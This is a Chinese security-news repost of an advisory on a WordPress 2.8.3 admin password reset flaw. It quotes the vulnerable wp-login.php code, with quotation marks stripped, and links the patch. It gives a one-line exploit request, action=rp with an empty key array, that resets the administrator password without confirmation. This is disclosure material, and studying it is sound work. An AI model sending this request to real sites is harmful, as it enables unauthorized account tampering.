频道栏目
首页 > 安全 > 网站安全 > 正文

WordPress 2.8.3出现管理员密码重置严重漏洞

2009-08-12 23:50:00      个评论      
收藏   我要投稿

SpookZanG

发现者: Laurent Gaffié
英文原文:http://www.milw0rm.com/exploits/9410
WordPress  2.8.3 管理员密码重置漏洞

这个漏洞能利用找回密码功能,让重置密码的信件在未经管理员同意的情况下发送到管理员的邮箱当中.

WordPress已经发布修补这个漏洞的补丁:http://core.trac.wordpress.org/changeset/11804

描述:

WordPress中处理密码重置的方式看起来像这样:

您通过这个形式递交您的电子邮件或用户名/wp-login.php?action=lostpassword ;

而WordPress会发送一封电子邮件来确认密码重置。

Someone has asked to reset the password for the following site and username.

(某人要求重新设置以下站点的用户名、密码)
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore this email and nothing will happen
(如果需要重置密码请点击下面的地址,否则请忽略这封电子邮件)
http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

你点击链接,然后重设您的WordPress的管理员密码。

wp-login.php:

 function reset_password($key) {
    global $wpdb;
 
    $key = preg_replace(/[^a-z0-9]/i, , $key);
 
    if ( empty( $key ) )
        return new WP_Error(invalid_key, __(Invalid key));
 
    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error(invalid_key, __(Invalid key)); 

 $action = isset($_REQUEST[action]) ? $_REQUEST[action] : login;
$errors = new WP_Error();
 
if ( isset($_GET[key]) )
    $action = resetpass;
 
// validate action so as to default to the login screen
if ( !in_array($action, array(logout, lostpassword, retrievepassword, resetpass, rp, register, login)) && false === has_filter(login_form_ . $action) )
    $action = login; 

 

 break;
 
case resetpass :
case rp :
    $errors = reset_password($_GET[key]);
 
    if ( ! is_wp_error($errors) ) {
        wp_redirect(wp-login.php?checkemail=newpass);
        exit();
    }
 
    wp_redirect(wp-login.php?action=lostpassword&error=invalidkey);
    exit();
 
break;

你能绕过第一步,从而可以随意进行重置管理员密码。

利用方法:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
密码将被重置,而不需要任何的确认信息

相关TAG标签 漏洞 管理员 密码
上一篇:Webshell in Oracle
下一篇:关于“ewebeditor v6.0.0版本漏洞”之错误
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站